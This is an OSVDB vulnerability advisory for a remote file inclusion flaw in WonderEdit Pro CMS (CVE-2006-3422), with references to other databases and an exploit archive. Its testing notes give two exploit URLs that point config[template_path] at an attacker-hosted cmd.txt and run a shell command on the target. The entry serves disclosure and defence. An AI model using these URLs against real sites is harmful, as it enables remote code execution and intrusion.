WonderEdit Pro CMS user_bottom.php config[template_path] Variable Remote File Inclusion

2006-07-04T09:38:06
ID OSVDB:34426
Type osvdb
Reporter OSVDB
Modified 2006-07-04T09:38:06

Description

Manual Testing Notes

http://[target]/[path]/template/rwb/user_bottom.php?config[template_path]=http://[attacker]/cmd.txt?&cmd=ls http://[target]/[path]/template/gwb/user_bottom.php?config[template_path]=http://[attacker]/cmd.txt?&cmd=ls

References:

ISS X-Force ID: 27536 Generic Exploit URL: http://milw0rm.com/exploits/1982 CVE-2006-3422 Bugtraq ID: 18821